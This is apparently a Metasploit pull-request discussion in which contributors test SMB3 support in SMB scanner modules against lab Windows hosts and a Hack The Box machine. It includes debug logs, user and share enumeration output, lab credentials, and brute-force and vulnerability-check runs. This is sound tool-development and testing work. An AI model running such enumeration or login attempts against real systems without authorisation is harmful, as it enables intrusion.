[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:38] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:04:58] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:04:58] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:19] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:39] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:05:40] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:05:40] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/10/2020 17:06:00] [d(0)] core: Negotiated SMB version: SMB2
[06/10/2020 17:06:01] [d(0)] core: Negotiated SMB version: SMB2

@cdelafuente-r7
Contributor Author

That error on Windows 8.1x86 is consistent.....

I could successfully reproduce this with an out-of-the-box Windows 8.1 (x86). My first assumption was that SMB3 dialects < 3.1.1 don't support session encryption and only per-share encryption as described here. However, after updating the OS (Windows Update), it appears to work properly.

I read the protocol again and found out my assumption was wrong: the 3.0.0 and 3.0.2 dialects also support session and per-share encryption, like 3.1.1.

So, out-of-the-box Windows 8 does not comply with the protocol. Actually, without updating the OS, SMB3 does not work properly in the first place. Do you mind trying again with an updated Windows 8, if possible?

@bwatters-r7
Contributor

Yup..... after update, all targets respond

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.134.0/24:     - Scanned  28 of 256 hosts (10% complete)
[*] 192.168.134.0/24:     - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.134.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.134.104:445   - WIN2019X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.109:445   - WIN2016X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.106:445   - WIN1803X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.111:445   - WIN10X86_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 103 of 256 hosts (40% complete)
[+] 192.168.134.117:445   - WIN10X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.115:445   - WIN1709X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.114:445   - WIN10X86_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.118:445   - WIN10X64_1703 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, defaultuser0, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.119:445   - WIN10X86_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.123:445   - WIN8X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.121:445   - WIN10X64_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 128 of 256 hosts (50% complete)
[+] 192.168.134.129:445   - WIN10X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.132:445   - WIN10X64_1709 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.151:445   - WIN2012X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.146:445   - WIN1809X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.149:445   - WIN10X64_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.156:445   - WIN81X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 155 of 256 hosts (60% complete)
[+] 192.168.134.164:445   - WIN10X64_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.162:445   - WIN81X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.172:445   - WIN2012R2X64SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.171:445   - WIN81X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.177:445   - WIN10X64_1803 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.187:445   - WIN2012R2X64 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.185:445   - WIN8X86 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.189:445   - WIN81X86SP1 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.191:445   - WIN10X86_1809 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant, WDAGUtilityAccount ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 183 of 256 hosts (71% complete)
[+] 192.168.134.193:445   - WIN10X86_1511 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.134.192:445   - WIN10X86_1607 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, DefaultAccount, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.134.0/24:     - Scanned 207 of 256 hosts (80% complete)
[*] 192.168.134.0/24:     - Scanned 231 of 256 hosts (90% complete)
[*] 192.168.134.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Log

[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:26] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:27] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:28:47] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:08] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:08] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:28] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:29] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:29:49] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:09] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:10] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:10] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[06/12/2020 11:30:30] [d(0)] core: Negotiated SMB version: SMB3
[06/12/2020 11:30:30] [d(0)] core: Negotiated SMB version: SMB3

@cdelafuente-r7
Contributor Author

Awesome! Thank you for testing @bwatters-r7.

Can we reasonably say that no change is needed since the updated version works fine?

@bwatters-r7
Contributor

I really dislike the error, even if it might not be on us. Is there any moderately easy way we could be more descriptive or recognize this particular error as a subclass of a reset?
I'm just trying to figure out how we might recognize this instance if someone were to send up the error output and logs.

@adfoster-r7
Contributor

I've tested some SMB aux scanner modules. OSX doesn't work for me. Windows works better, but some of the modules don't work as expected for me.

OSX Testing

Target

I set up a local share for this and a new test account for smb sharing

set RHOSTS 127.0.0.1
set SMBUser test
set SMBPass test

This originally gave me:

> run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - Login Failed: NBSS Header is missing
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

With the latest ruby_smb branch that error doesn't occur anymore. However, an access denied error is received instead:

msf5 auxiliary(scanner/smb/smb_enumshares) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf5 auxiliary(scanner/smb/smb_enumshares) > run
[-] 127.0.0.1:139         - Error: '127.0.0.1' 'Rex::ConnectionRefused' 'The connection was refused by the remote host (127.0.0.1:139).'
[-] 127.0.0.1:445         - The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[!] 127.0.0.1:445         - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 127.0.0.1:445         - peer_native_lm is only available with SMB1 (current version: SMB2)
[*] 127.0.0.1:445         - No shares collected
[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Logs:

[06/15/2020 14:28:34] [d(0)] core: SMB version(s) to negotiate: [1, 2]
[06/15/2020 14:28:34] [d(0)] core: Negotiated SMB version: SMB2

Note that impacket works fine in this scenario.

Windows

Target

Tested on some HTB boxes. The reports below are from HTB monteverde - smb://SABatchJobs:SABatchJobs@10.10.10.172

setg RHOSTS 10.10.10.172
setg SMBUser SABatchJobs
setg SMBPass SABatchJobs

scanner/smb/smb_enumshares

Works as expected:

msf5 auxiliary(scanner/smb/smb_enumshares) > run

[-] 10.10.10.172:139      - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 10.10.10.172:445      - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 10.10.10.172:445      - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 10.10.10.172:445      - ADMIN$ - (DISK) Remote Admin
[+] 10.10.10.172:445      - azure_uploads - (DISK) 
[+] 10.10.10.172:445      - C$ - (DISK) Default share
[+] 10.10.10.172:445      - E$ - (DISK) Default share
[+] 10.10.10.172:445      - IPC$ - (IPC) Remote IPC
[+] 10.10.10.172:445      - NETLOGON - (DISK) Logon server share 
[+] 10.10.10.172:445      - SYSVOL - (DISK) Logon server share 
[+] 10.10.10.172:445      - users$ - (DISK) 
[*] 10.10.10.172:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumusers

Works as expected:

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.172:445      - MEGABANK [ Administrator, Guest, krbtgt, AAD_987d7f2f57d2, mhope, SABatchJobs, svc-ata, svc-bexec, svc-netapp, dgalanos, roleary, smorgan ] ( LockoutTries=0 PasswordMin=7 )
[*] 10.10.10.172:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_login

scanner/smb/smb_login doesn't appear to work. I think this is due to the SMB domain by default being a dot ('.').
If you set a blank SMB domain entirely, it becomes WORKSTATION

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\SABatchJobs:SABatchJobs',
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_version

Doesn't appear to work:

msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.172:445      - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.10.10.172:445      - Host could not be identified:  ()
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)

Log:

[06/15/2020 13:43:11] [d(0)] core: SMB version(s) to negotiate: [1]
[06/15/2020 13:43:11] [d(0)] core: Error with SMB fingerprint: Login Failed: Connection reset by peer

smb_checks.rc

Currently broken due to smb login above:

> resource ./scripts/resource/smb_checks.rc
[*] Processing /Users/user/Documents/code/metasploit-framework/scripts/resource/smb_checks.rc for ERB directives.
[*] resource (/Users/user/Documents/code/metasploit-framework/scripts/resource/smb_checks.rc)> Ruby Code (3070 bytes)
verbose => true
[*] Performing checks...
[*] Number of hosts to check: 1
[*] Checking 10.10.10.172:445 (microsoft-ds)
[*] Checking SMBv1 on 10.10.10.172
[*] SMBv1 check job ID for target 10.10.10.172 is: 3
[*] Checking MS17-010 on 10.10.10.172
[*] MS17-010 job ID for target 10.10.10.172 is: 4
[*] Checking MS08-067 on 10.10.10.172
[*] MS08-067 job ID for target 10.10.10.172 is: 5

[-] 10.10.10.172:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)

@cdelafuente-r7
Contributor Author

cdelafuente-r7 commented Jun 16, 2020

@adfoster-r7, thanks for testing again, really appreciated.

It looks like it is also broken on MSF master branch. I tracked down the issue and had to update this:

  • SimpleClient#create_pipe sets the default perm parameter to c (here), which gets translated to the FILE_OPEN_IF disposition. This defines which action the server must take when opening the file: Open the file if it already exists; otherwise, create the file. According to the specs, this field is ignored for pipes:

For opening named pipes, this field can be set to any value by the client and MUST be ignored by the server.

However, it appears that Mac OS X cares about it and fails with STATUS_ACCESS_DENIED if it is not FILE_OPEN disposition (If the file already exists, return success; otherwise, fail the operation). IMHO, it makes sense for named pipes, but it does not follow the specs.

